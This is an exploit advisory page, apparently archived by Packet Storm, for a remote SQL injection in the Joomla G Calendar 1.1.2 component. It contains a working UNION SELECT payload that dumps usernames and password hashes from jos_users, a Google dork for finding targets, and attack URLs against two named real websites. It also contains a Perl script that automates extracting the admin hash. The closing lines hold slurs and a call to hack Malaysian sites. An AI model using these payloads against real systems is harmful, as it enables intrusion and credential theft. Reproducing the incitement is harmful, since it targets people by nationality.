we care because you do

Joomla G Calendar 1.1.2 SQL Injection

Joomla G Calendar 1.1.2 SQL Injection
Posted Nov 25, 2009
Authored by Yogyacarderlink Crew | Site yogyacarderlink.web.id

The Joomla G Calendar component version 1.1.2 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 42384fd73684ec30fddfe39490a71d33

Joomla G Calendar 1.1.2 SQL Injection

Change Mirror Download
 __   __  ___    ___  __   __  ___    ___    ___    ___    ___    ___    ___    _      ___   _  _   _  __  
\ \ / / / _ \ / __| \ \ / / / \ / __| / \ | _ \ | \ | __| | _ \ | | |_ _| | \| | | |/ /
\ V / | (_) || (_ | \ V / | - | | (__ | - | | / | |) | | _| | / | |__ | | | .` | | ' <
_|_|_ \___/ \___| _|_|_ |_|_| \___| |_|_| |_|_\ |___/ |___| |_|_\ |____| |___| |_|\_| |_|\_\
_| """ ||"""""||"""""|| """ ||"""""||"""""||"""""||"""""||"""""||"""""||"""""||"""""||"""""||"""""||"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`
----------------------------------------------------------------------------------------------------------
[o] Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability

--==[ Author ]==--
# Author : Yogyacarderlink Crew
# Group : YOGYACARDERLINK
# Site : http://yogyacarderlink.web.id/
# Date : November, 26-2009 [INDONESIA]


Remote SQL Injection were identified in Google Calendar Joomla Component

Application: Google Calendar Component
Versions Affected: v1.1.2 old versions may also be affected
Download: http://extensions.joomla.org/extensions/calendars-a-events/calendars/4188
License: GPL
Vulnerable: Remote SQL Injection
Google Dork: inurl:"com_gcalendar"


Description
***********

Google Calendar is a component that will allow you to embed Google Calendars on your Joomla 1.5 site with ease!
You'll be amazed at the flexibility allowed and the degree of customization.

Details
*******

[!] SQL Injection
attacks are another instantiation of injection attack,
in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands

Exploit
*******

-9999+union+select+0,concat(username,0x3a,password),2,3,4+from+jos_users--


Proof of Concept
****************

https://chesnetpc.com/clients/index.php?option=com_gcalendar&tmpl=component&view=event&eventID=peler&start=memek&end=kentu&gcid=3+AND+1=2+UNION+SELECT+0,concat(username,0x3a,password),2,3,4+from+jos_users--

http://www.conradawards.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat(username,0x3a,password),2,3,4+from+jos_users--

-------------------------------------------------------------------------
#!/usr/bin/perl -w

#Joomla com_gcalendar (gcid) Sql injection
#Coded by v3n0m
#Gre4tz: All Yogyacarderlink Crew
#Special Gre4tz: Google

print "|----------------------------------------------------|\n";
print "| YOGYACARDERLINK 'com_gcalendar Remote Injector' |\n";
print "| Coded by : v3n0m |\n";
print "| Greetz : LeQhi (bug founder) |\n";
print "| sHoutz : Yogyacarderlink Crew |\n";
print "| |\n";
print "| -v3n0m & lingah paling ganteng se-jogjakarta- |\n";
print "| |\n";
print "| www.yogyacarderlink.web.id |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nMasukin Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
#Nama Column
$kontol="group_concat(username,0x3a,password)";
#Nama Table
$memek="jos_users";
$ngentot="-9999+union+select+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=".$ngentot."0,".$kontol.",2,3,4+from/**/".$memek."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "Sukses coy !! Wah selamat yee bro...\n";
print "Coba langsung dicheck ke TKP aja bro biar lebih yakin...\n";
print "\n";
print "Attention:\n";
print "v3n0m & lingah emang paling ganteng...\n";
print "Yang kaga setuju/protes = GAY !!\n";
print "\n";
}
else{print "\n[-] wah gagal bro (Belom Cebok tangan lo)...\n";
}

-------------------------------------------------------------------------

Thankz : lingah,aRiee,v3n0m,z0mb13,m4rco,NaZmy,IdioT_InsidE,eidelweiss
JaLi-,yoga0400,Anak_Naga_,badkiddies,g0nz,mywisdom,setanmuda
jo8928,ripper_maya,elv1n4,dhit_coxon and all YOGYACARDERLINK crew

* Fuck to Malaysia <= the truly thief asia
be carefull your culture art & song,island get stolen and claimed by them
letz we hack their sites & servers !! PROUD TO BE INDONESIAN !!
Bangga Menjadi Orang INDONESIA !!

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    11 Files
  • 27
    May 27th
    8 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close